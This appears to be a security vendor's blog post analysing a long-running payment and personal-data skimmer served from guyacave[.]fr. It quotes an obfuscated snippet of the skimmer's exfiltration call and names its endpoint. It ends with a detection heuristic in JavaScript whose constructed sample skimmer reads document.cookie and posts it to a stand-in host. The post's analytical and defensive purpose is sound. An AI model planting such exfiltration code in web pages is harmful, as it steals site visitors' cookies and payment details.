c/side just detected a client-side attack that’s been active for over 2 years. The domain guyacave[.]fr has been serving a Personally Identifiable Information (PII) skimmer script on multiple websites since August of 2022. Check your website now, and remove the script with this domain immediately if found.
During analysis of malicious scripts, we came across a website infected by one. On this website, we can see it has been active since August of 2022. We’ve notified this and other websites of this attack.
In further research, we came across a post by Decoded Avast from November 2022 where the domain guyacave[.]fr was already mentioned as malicious.
They write:
Attackers also exploited other legitimate sites, such as sites selling clothes, shoes, jewellery, furniture and medical supplies, to host their skimming code. Specifically, they used guyacave[.]fr, servair[.]com and stripefaster[.]com. Attackers exfiltrated payment details via the POST request to URLs like guyacave[.]fr/js/tiny_mce/themes/modern/themes.php and similar for the other domains. In some cases, the POST request was sent to the infected e-commerce site itself, indicating that the attacker has full access to the compromised sites. We protected nearly 17,000 users globally from this webskimmer.
The inline snippet _0x800b[140];var _0xb61ex27= new XMLHttpRequest();_0xb61ex27[_0x800b[143]](_0x800b[141],_0x800b[142],true);_0xb61ex27[_0x800b[144]](_0xb61ex25) inside the script indicates that it uses an XMLHttpRequest to send the private payment details to an external endpoint (the method name, the request URL and the send call are all looked up by index from the obfuscated string array _0x800b rather than appearing in clear text). In this case, the endpoint is https://guyacave[.]fr/js/tiny_mce/themes/modern/themes.php.
The script has functions for reading and writing cookies, likely used to steal session cookies and other sensitive information stored in the browser.
We also found the Math.random() function being used to create dynamic elements. This is what makes third-party scripts dangerous, and securing them essential: any third-party script is inherently dynamic and can change based on all kinds of parameters. Here, Math.random() helps the script evade simple signature-based detection methods.
c/side’s engine is more advanced, and was able to detect and block this malicious script in our tests.
Finally, the script manipulates the website’s UI to hide certain elements. It does this with the simple CSS rule display:none, to present the fake payment form instead of the real one.
Threat feeds are the main way businesses inform themselves on malicious domains linked on their website. At c/side, we don’t believe this is the best solution for client-side security.
The 1st reason threat feeds don’t work
To date, only 10 out of 96 security vendors on VirusTotal have flagged this domain as malicious. Threat feeds have their purpose, but are insufficient for client-side security. This attack shows that even after 2 years, most feeds have not caught up. At best, they catch and alert after the fact. At worst, the attack goes undetected for years.
Prevention is the next step
Even if the domain had been flagged earlier and by more feeds, attackers could simply search for a new domain that suits their needs.
Threat feeds rely on checking the source, in this case the domain, not the payload of the code. This makes detection practically impossible until someone manually flags the domain, which makes threat feeds a reactive solution, not a preventative one.
In our tests, c/side was able to detect and block this malicious script and domain. Had these websites, or the platforms they were built on, had c/side in place, this attack would have been noticed and stopped immediately.
On each session, we load third-party scripts in a secure proxy which checks the actual payload of the script, not just the sources and domains. If we detect anything suspicious, our customers are alerted and the script is blocked from loading in the browser of the website visitor.
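To illustrate what payload inspection can do that a domain lookup cannot, here is a small heuristic written for this post (example code, not c/side’s engine): it first resolves the hex-named string array that the snippet above indexes into (_0x800b[N]), then scores the decoded text for the traits described above. The two sample scripts and the skimmer.example host are constructed for the example.

```javascript
// Resolve an obfuscator string table: obj[_0xNNNN[i]] -> obj.value, bare _0xNNNN[i] -> 'value'.
function decodeStringArray(src) {
  const m = src.match(/var\s+(_0x[0-9a-f]+)\s*=\s*\[([^\]]*)\]/i);
  if (!m) return src; // no table declared: nothing to resolve
  const [, name, body] = m;
  const table = [...body.matchAll(/'([^']*)'|"([^"]*)"/g)].map(s => s[1] ?? s[2]);
  const ref = new RegExp(`\\[${name}\\[(\\d+)\\]\\]|${name}\\[(\\d+)\\]`, 'g');
  return src.replace(ref, (whole, prop, bare) => {
    const idx = Number(prop ?? bare);
    if (idx >= table.length) return whole; // unknown index: leave untouched
    return prop !== undefined ? `.${table[idx]}` : `'${table[idx]}'`;
  });
}

// Traits seen in the skimmer on this page; benign traits alone stay below the threshold.
const INDICATORS = [
  { id: 'obfuscated-string-array', weight: 2, re: /var\s+_0x[0-9a-f]+\s*=\s*\[/i },
  { id: 'xhr-post',                weight: 2, re: /XMLHttpRequest[\s\S]*?\.open\s*\(\s*['"]POST['"]/ },
  { id: 'cookie-access',           weight: 2, re: /document\.cookie/ },
  { id: 'math-random',             weight: 1, re: /Math\.random\s*\(/ },
  { id: 'display-none',            weight: 1, re: /display\s*[:=]\s*['"]?none/ },
];

function scanScript(src) {
  const decoded = decodeStringArray(src);
  const hits = INDICATORS.filter(i => i.re.test(decoded));
  const score = hits.reduce((s, i) => s + i.weight, 0);
  // Once decoded, the POST target is visible and can be alerted on directly.
  const target = decoded.match(/\.open\s*\(\s*['"]POST['"]\s*,\s*['"]([^'"]+)['"]/);
  return { score, findings: hits.map(i => i.id), endpoint: target ? target[1] : null, flagged: score >= 4 };
}

// Constructed fixture in the style of the skimmer on this page (not the real script).
const SAMPLE_SKIMMER =
  "var _0x800b=['cookie','open','POST','https://skimmer.example/themes.php','send','style','display','none'];" +
  "var _0xb61ex25=document[_0x800b[0]];var _0xb61ex27=new XMLHttpRequest();" +
  "_0xb61ex27[_0x800b[1]](_0x800b[2],_0x800b[3],true);_0xb61ex27[_0x800b[4]](_0xb61ex25);" +
  "document.getElementById('f'+Math.random())[_0x800b[5]][_0x800b[6]]=_0x800b[7];";
// Constructed benign script: also uses Math.random and display:none, but exfiltrates nothing.
const SAMPLE_BENIGN =
  "var id='banner'+Math.random();document.getElementById(id).style.display='none';";

console.log(scanScript(SAMPLE_SKIMMER)); // flagged: true, endpoint: https://skimmer.example/themes.php
console.log(scanScript(SAMPLE_BENIGN));  // flagged: false, score: 2
```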
You can sign up for c/side and protect your site in minutes.